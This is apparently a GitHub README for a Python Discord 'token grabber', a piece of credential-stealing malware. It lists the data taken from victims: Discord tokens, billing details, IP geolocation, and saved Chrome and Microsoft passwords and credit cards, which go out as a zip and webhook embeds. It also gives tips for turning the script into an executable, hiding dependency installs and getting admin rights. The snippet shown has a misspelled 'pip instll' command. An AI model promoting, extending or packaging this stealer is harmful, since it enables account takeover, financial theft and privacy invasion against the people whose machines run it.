Skip to content

Latest commit

 

History

History
90 lines (67 loc) · 2.29 KB

TG-README.md

File metadata and controls

90 lines (67 loc) · 2.29 KB

What about the flafla_in_your_discord_zbi.py file ?

Setting up

For the set-up check the Setting up section of main README

Fonctionalities


The different fonctionalities of my discord Token Grabber
logo

Discord account infos :

  • Email
  • Registered Phone
  • Nitro status
  • Billing infos
  • Discord Tokens

Pc infos :

  • Computer OS
  • Username
  • PC Name
  • Token Location

GEO-IP Infos

  • IP addr
  • Geolocation (gps coordinates with gg map link)
  • City (conceptual location regarding the IP)
  • Region

Other infos

  • Country
  • Email Status
  • 2FA/MFA Status
  • Creation date

Stored infos

  • Locally stored password
    • Microsoft
    • Chrome
  • Locally Stored CC infos
    • Microsoft
    • Chrome

Additional infos

  • The last part od Stored infos are send in a separate .zip file before the embeds informations
  • There is one embed per account registered in the computer through :
    • Discord
    • Discord Canary
    • Discord PTB
    • Google Chrome
    • Opera
    • Brave
    • Yandex
    • You can add Some Tokens path for other browsers if you know it in the PATHS constant line 63 while respecting the structure

Some other things to know about

You can easily convert the file in an executable with any converter

If you are using an executable version, you can dodge the requirements installation phase by adding this :

| line 12 |

try:
    import dhooks
except ImportError:
    print('Loading...')
    os.system("pip install dhooks > nul")
    os.system('cls')
try:
    import cryptography
except ImportError:
    print('Loading...')
    os.system("pip instll cryptography > nul")
    os.system('cls')

Knowing that you have the possibility with an executable to ask for the admins rights which avoids the problems of privileges (I strongly recommanded auto-py-to-exe it's easy and efficient)


That's all for me ! Have a lot of fun 🐱‍👤

Cordially,

SirThirrygolooo